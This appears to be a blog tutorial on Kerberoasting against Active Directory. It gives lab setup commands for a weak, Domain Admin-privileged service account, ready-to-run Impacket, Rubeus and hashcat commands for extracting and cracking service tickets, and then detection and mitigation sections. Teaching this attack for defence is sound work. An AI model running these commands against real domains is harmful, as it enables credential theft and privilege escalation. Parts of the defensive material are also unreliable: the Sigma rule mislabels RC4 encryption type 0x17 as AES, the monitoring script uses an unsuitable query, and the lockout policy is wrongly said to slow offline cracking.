Kerberoasting is one of the most effective post-exploitation techniques used by attackers and red teamers to escalate privileges in Windows domains. In this article, we’ll dive deep into how the attack works, set up a lab environment, execute the attack step-by-step, and most importantly—learn how to detect and mitigate it.
Understanding Kerberoasting
Kerberoasting exploits the Kerberos authentication protocol used in Active Directory. Here’s the simplified flow:
- A user requests a Ticket-Granting Ticket (TGT) from the Key Distribution Center (KDC)
- The user presents their TGT to request a Ticket-Granting Service (TGS) for a specific service
- The TGS is encrypted with the service account’s password hash
The attacker’s goal: Request TGS tickets for service accounts, crack the encrypted portion offline, and recover the plaintext password.
Why It Works
- Service accounts often have privileged access (Domain Admin, SQL Server, etc.)
- Passwords are rarely rotated and tend to be weak
- TGS tickets are encrypted with NTLM hashes, which are crackable
- The attack is stealthy and blends in with normal traffic
Lab Environment Setup
For this hands-on demonstration, we’ll use:
- Attacker machine: Kali Linux
- Target: Windows Server 2019 with Active Directory
- Tools: Impacket, Rubeus, Hashcat
Setting Up Vulnerable Service Accounts
On your Windows domain controller, create a vulnerable service account:
# Create a service account with a weak password
New-ADUser -Name "ServiceAccount" -SamAccountName "ServiceAccount" `
-UserPrincipalName "[email protected]" `
-AccountPassword (ConvertTo-SecureString "Summer2024!" -AsPlainText -Force) `
-Enabled $true
# Set SPN (Service Principal Name) to make it Kerberoasteable
setspn -A HTTP/webservice.domain.local ServiceAccount
# Grant the account Domain Admin privileges (for demonstration)
Add-ADGroupMember -Identity "Domain Admins" -Members "ServiceAccount"
Configure Attacker Machine
# Install required tools on Kali
git clone https://github.com/fortra/impacket.git
cd impacket && pip3 install .
git clone https://github.com/hashcat/hashcat.git
Executing the Attack
Step 1: Reconnaissance
First, enumerate all Kerberoasteable accounts using Impacket’s GetUserSPNs:
# Using credentials obtained from initial access
python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py \
-request \
-dc-ip 192.168.1.10 \
DOMAIN.LOCAL/username:Password123
This command requests TGS tickets for all accounts with SPNs set.
Step 2: Extracting TGS Tickets
Alternatively, using Rubeus on a Windows machine:
# Request TGS for specific account
.\Rubeus.exe kerberoast /outfile:hashes.txt
# Or for all accounts
.\Rubeus.exe kerberoast /all /outfile:all_hashes.txt
The output will look like:
$krb5tgs$23$*ServiceAccount$DOMAIN.LOCAL$HTTP/[email protected]*[redacted hash]
Step 3: Cracking the Hash
Now the fun part—cracking the TGS hash with Hashcat:
# Mode 13100 is for Kerberos 5 TGS-REP etype 23
hashcat -m 13100 hashes.txt wordlist.txt --rules best64.rule
Common passwords to try:
- Season + Year:
Summer2024!,Winter2024! - Default patterns:
Password123!,Service123! - Company name + Year:
Company2024!
Detection Strategies
Windows Event Log Monitoring
Event ID 4769: A Kerberos service ticket was requested
Look for these anomalies:
# Search for unusual ticket requests
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4769} -MaxEvents 1000 |
Where-Object { $_.Message -notmatch "krbtgt" } |
Group-Object TargetUserName |
Sort-Object Count -Descending
Indicators of Kerberoasting:
- Same account requesting many TGS tickets in short time span
- Requests from unusual source IPs
- Service accounts with privileged group membership requesting tickets
Sigma Rule for Detection
title: Kerberoasting Attack Detected
id: 1a1b2c3d-4e5f-6a7b-8c9d-0e1f2a3b4c5d
status: experimental
description: Detects potential Kerberoasting activity
author: Your Name
date: 2025/01/15
logsource:
product: windows
service: security
detection:
selection:
EventID: 4769
TargetUserName: '*$@*' # Machine accounts usually
filter:
TicketEncryptionType: 0x17 # AES enabled accounts
condition: selection and not filter
fields:
- TargetUserName
- IpAddress
- TicketEncryptionType
level: high
PowerShell Script for Continuous Monitoring
# Monitor for Kerberoasting in real-time
$query = "*[System[(EventID=4769)]]"
$results = @()
Register-WmiEvent -Query $query -SourceIdentifier "Kerberoasting" -Action {
$event = $EventArgs.NewEvent
$user = $event.TargetUserName
$ip = $event.IpAddress
# Alert if account is privileged
$groups = Get-ADUser $user -Properties MemberOf | Select-Object -ExpandProperty MemberOf
if ($groups -match "Domain Admin|Enterprise Admin") {
Write-Host "[ALERT] Privileged account Kerberoast: $user from $ip" -ForegroundColor Red
}
}
Mitigation Strategies
1. Use Strong Passwords for Service Accounts
# Generate and set a strong password
$password = -join ((65..90) + (97..122) + (48..57) + (33..47) | Get-Random -Count 20 | ForEach-Object {[char]$_})
Set-ADAccountPassword -Identity "ServiceAccount" -NewPassword (ConvertTo-SecureString $password -AsPlainText -Force)
2. Enable AES Encryption
# Use AES keys instead of RC4
Set-ADUser -Identity "ServiceAccount" -Add @{"msDS-SupportedEncryptionTypes"="24"}
3. Implement Least Privilege
- Avoid granting Domain Admin to service accounts
- Use separate accounts for services and administration
- Regularly audit group memberships
4. Reduce Ticket Lifetime
# In Group Policy
# Computer Configuration > Administrative Templates > KDC > Enforce minimum logon security
5. Account Lockout Policies
Even if attackers try to crack passwords, proper lockout policies can slow them down:
# Set strict lockout policy
Set-ADDefaultDomainPasswordPolicy -Identity "DOMAIN.LOCAL" `
-LockoutDuration "00:30:00" `
-LockoutObservationWindow "00:30:00" `
-MaxBadPasswordsAllowed 5
Conclusion
Kerberoasting remains a highly effective attack because it exploits fundamental design choices in Kerberos and human habits (weak passwords). The attack is silent, requires no code execution on the DC, and can yield Domain Admin credentials.
The key defense is a layered approach: strong passwords, least privilege, monitoring, and regular audits. As defenders, understanding the attack is the first step to building effective detection rules.
Lab Challenge: Set up your own lab and try to:
- Create a vulnerable service account
- Execute the Kerberoasting attack
- Write a detection rule that catches your own attack
- Implement one mitigation and verify it works
Sources: